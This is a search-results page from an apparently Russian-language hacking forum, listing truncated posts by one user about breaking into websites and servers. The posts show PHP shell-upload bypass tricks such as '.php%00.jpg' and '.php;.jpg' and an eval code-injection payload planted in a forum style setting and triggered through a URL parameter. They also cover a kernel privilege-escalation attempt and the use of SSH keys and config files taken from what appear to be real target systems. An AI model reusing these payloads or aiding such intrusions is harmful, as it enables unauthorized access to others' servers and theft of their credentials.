Вернуться   RDot > Поиск по форуму

Показано с 1 по 18 из 18.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: beau
Раздел: Криптография/Cryptography 30.05.2014, 23:21
Ответов: 9
Просмотров: 11,838
Автор beau
Red face TrueCrypt RIP

_http://habrahabr.ru/post/224491/
Как относитесь к сабжу?) Какие аналоги посоветуете? :)
Раздел: Сценарии/CMF/СMS 30.05.2014, 02:41
Ответов: 4
Просмотров: 9,658
Автор beau
ТС, ну как залился? Я тоже воюю с ресом на yii.

ТС, ну как залился? Я тоже воюю с ресом на yii.
Раздел: Web-среда/Web-applications 29.05.2014, 05:57
Ответов: 3,616
Просмотров: 1,920,127
Автор beau
Не успел я затестиь способ, снесли все скрипты :)...

Не успел я затестиь способ, снесли все скрипты :)
Есть новый вопрос :)
Есть цмс, написана на YII фреймворке.
Есть возможность создавать кастомные поля для профиле юзера. При создании можно...
Раздел: Web-среда/Web-applications 27.05.2014, 23:24
Ответов: 3,616
Просмотров: 1,920,127
Автор beau
Код который я указал выше подключается в страницу...

Код который я указал выше подключается в страницу и просто ловит POST запрос:
<?php get_header(); ?>
<?php
// $srmp = ($_SERVER['REQUEST_METHOD'] == "POST") ? true : false;
?>
<div class="bd">...
Раздел: Web-среда/Web-applications 27.05.2014, 17:59
Ответов: 3,616
Просмотров: 1,920,127
Автор beau
Возможно ли обойти проверки и залить .php? ...

Возможно ли обойти проверки и залить .php?
<?php
function required_fields_validate(){

$errors = array();
$allowed_types = array('jpg', 'jpeg', 'gif', 'png', 'bmp');

if...
Раздел: Форумы 23.05.2014, 18:48
Ответов: 10
Просмотров: 14,279
Автор beau
Да действительно изменения не были внесены,...

Да действительно изменения не были внесены, сейчас попробую создать новый стиль.

//upd - создал новый стиль и всё отработало как часы!) Большое спасибо, Белый Тигр!
Раздел: Форумы 23.05.2014, 18:39
Ответов: 10
Просмотров: 14,279
Автор beau
Стиль всего один и он выбран в конфигурации.

Стиль всего один и он выбран в конфигурации.
Раздел: Форумы 23.05.2014, 01:40
Ответов: 10
Просмотров: 14,279
Автор beau
В поле Background Image: вписал...

В поле Background Image: вписал {${eval($_GET[chr(122)])}}, потом сделал экспорт, получил ответ что всё прошло успешно, сейчас там отображается
Раздел: Форумы 22.05.2014, 22:38
Ответов: 10
Просмотров: 14,279
Автор beau
Вписал код, сделал экспорт, при переходе по...

Вписал код, сделал экспорт, при переходе по ссылке admin_styles.php?mode=addnew&z=phpinfo(); ничего не происходит( пропатчено?

Помогите залиться ребята) Ситуация схожая:
Бага в профиле с нулевым...
Раздел: Сценарии/CMF/СMS 21.05.2014, 01:49
Ответов: 2
Просмотров: 10,301
Автор beau
Заливка шелла CKFinder 2

Сабж, есть способы залиться? пробовал с контент тайпом картинки лить:
.php%00.jpg
.php;.jpg
.php4
.php5

на первые два варианта выдаёт - загруженный файл поврежден.
Раздел: Web-среда/Web-applications 09.05.2014, 02:44
Ответов: 4
Просмотров: 7,444
Автор beau
к сожелению Хотя в папке /etc есть php.ini

к сожелению
Хотя в папке /etc есть php.ini
Раздел: Web-среда/Web-applications 07.05.2014, 22:24
Ответов: 4
Просмотров: 7,444
Автор beau
Question Вопросы по XXE injection в Zend Framework

Нашел уязвимый ресурс, но есть проблемка, на запрос:

Получаем ответ:

Я как понимаю, это из-за директивы LocationMatch в конфиге, который инклудится(спец-символы) и как-то надо их...
Раздел: Целевые системы/Target systems 05.04.2014, 15:51
Ответов: 21
Просмотров: 18,768
Автор beau
Уже запостил на insidepro - ничего не сбрутили(

Уже запостил на insidepro - ничего не сбрутили(
Раздел: Целевые системы/Target systems 05.04.2014, 11:41
Ответов: 21
Просмотров: 18,768
Автор beau
Да, полный. Буду пробовать авторизоваться тогда.

Да, полный. Буду пробовать авторизоваться тогда.
Раздел: Повышение привилегий/Privilege escalation 04.04.2014, 19:32
Ответов: 1,219
Просмотров: 555,903
Автор beau
Запустил, начали без остановки сыпаться ошибки ...

Запустил, начали без остановки сыпаться ошибки
perf_event_open child: Invalid argument
perf_event_open child: Invalid argument
perf_event_open child: Invalid argument
perf_event_open child:...
Раздел: Повышение привилегий/Privilege escalation 04.04.2014, 06:45
Ответов: 1,219
Просмотров: 555,903
Автор beau
================================================ ...

================================================
[b]uname -a[/b]
================================================
Linux s16 2.6.32-5-amd64 #1 SMP Mon Feb 25 00:26:11 UTC 2013 x86_64 GNU/Linux
...
Раздел: Целевые системы/Target systems 04.04.2014, 06:03
Ответов: 21
Просмотров: 18,768
Автор beau
madhatter, спасибо за ответ! Эти данные удалось...

madhatter, спасибо за ответ!
Эти данные удалось вытащить из бекапа папки /etc/, больше ничего не было.

Так же я всё таки вытащил ключи одного юзера:
id_rsa
id_rsa.pub
authorized_keys

+...
Раздел: Целевые системы/Target systems 04.04.2014, 04:06
Ответов: 21
Просмотров: 18,768
Автор beau
Тоже есть вопрос по поводу авторизации по ключам....

Тоже есть вопрос по поводу авторизации по ключам. Ситуация следущая - есть ключи из /etc/ssh/
http://clip2net.com/clip/m0/1396569877-clip-2kb.png
Можно ли законектится используя какой-то из этих...
Показано с 1 по 18 из 18.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot